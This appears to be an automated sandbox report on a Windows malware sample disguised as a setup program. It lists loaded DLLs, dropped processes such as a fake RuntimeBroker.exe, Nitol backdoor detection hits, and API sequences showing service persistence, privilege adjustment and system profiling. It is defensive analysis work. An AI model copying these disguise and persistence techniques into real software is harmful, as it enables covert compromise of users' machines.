                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246839642.000000000470C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWeGame. vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameWeGame. vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenamepolicytool.exeN vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameD vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenamevmware.exeF vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenamecacheMod.exe: vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameMsi.dll,MsiHnd.dll,MsiExec.exeD vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameMsi.dll,MsiHnd.dll,MsiExec.exeX vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenamesetup.exex, vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameupgrader.exe: vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE x, vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenametoolsinstutil.dll: vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameSetAllUsers.dllP vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenamehhupd.exeL vs setup#U67e5#U8be2_pf2024.exe
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: twext.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: shacct.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: idstore.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: starttiledata.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: acppage.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: wlidprov.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: provsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: twext.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: starttiledata.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: acppage.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: twext.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: starttiledata.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: acppage.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: adapt_for_imports.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: lua51.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: common.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: common.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: jli.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Users\Statr\kill.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: libcef.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: devenum.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: msdmo.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                    Source: setup#U67e5#U8be2_pf2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                    Source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                    Source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                    Source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                    Source: common.dll.0.drBinary string: [Sys_wrapper]WritePrivateProfile fail, session:{}, key:{}, file:{}NtSuspendProcessntdllNtResumeProcess[Sys_wrapper]GetStrValueFromReg, open reg key failed, key:{}, error:{}[Sys_wrapper]GetStrValueFromReg, get reg value failed, key:{}, value_name:{}, error:{}[Sys_wrapper]GetStrValueFromReg, invalid size[Sys_wrapper]SetRegValue, open reg path failed, path:{}, error:{}[Sys_wrapper]SetRegValue, set reg value failed, path:{}, value_name:{}, value:{}, error:{}[Sys_wrapper]ACLineStatus:{},BatteryFlag:{}kernel32\Device\HarddiskVolume\\.\PhysicalDrive%dA:\%SystemDrive%\ :TENINSTIPGlobal\%s_%X_%de:\dailybuild_dev\wegame_client\dependences\tpf_for_tgp_sdk\include\teniobase\template\processhelp_t.h[ProcessHelp][RetrieveGameImagePathByProcessId]MapViewOfFile fail, hListMap:%p, err:%d[ProcessHelp][RetrieveGameImagePathByProcessId]OpenFileMappingA fail, iamge path:%s, err:%d
                    Source: RuntimeBroker.exe.0.drBinary string: \\.\RtlNtStatusToDosErrorNtQueryInformationProcessntdll.dllHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_PERFORMANCE_DATAHKEY_PERFORMANCE_TEXTHKEY_PERFORMANCE_NLSTEXTHKEY_CURRENT_CONFIGHKEY_DYN_DATA\Device\\Device\HarddiskVolumentdll.dllY@\/
                    Source: RuntimeBroker.exe.0.drBinary string: sbox_alternate_desktop_local_winstation_0x%X\Device\\/?/?\**~*NtQueryAttributesFileNtQueryFullAttributesFileNtSetInformationFile\/?/?\\??\NtCreateFile
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@11/16@5/4
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_1000CF40 GetLastError,FormatMessageA,lua_pushstring,lua_pushfstring,3_2_1000CF40
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035222D4 CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,6_2_035222D4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_100016D0 CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,6_2_100016D0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035265D4 getsockname,GetVersionExA,RegOpenKeyA,RegQueryValueExA,RegCloseKey,GlobalMemoryStatusEx,GetDiskFreeSpaceExA,GetLastInputInfo,GetTickCount,lstrcpy,6_2_035265D4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetModuleFileNameA,ExpandEnvironmentStringsA,_strncoll,wsprintfA,CopyFileA,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlen,RegSetValueExA,6_2_035282E4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetModuleFileNameA,ExpandEnvironmentStringsA,_strncoll,wsprintfA,CopyFileA,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlen,RegSetValueExA,6_2_100076E0
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0045DC75 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32First,memset,CloseHandle,OpenProcess,GetModuleFileNameExW,K32GetModuleFileNameExW,SimpleUString::operator=,memset,_wsplitpath_s,SimpleUString::operator=,FindCloseChangeNotification,Process32Next,CloseHandle,3_2_0045DC75
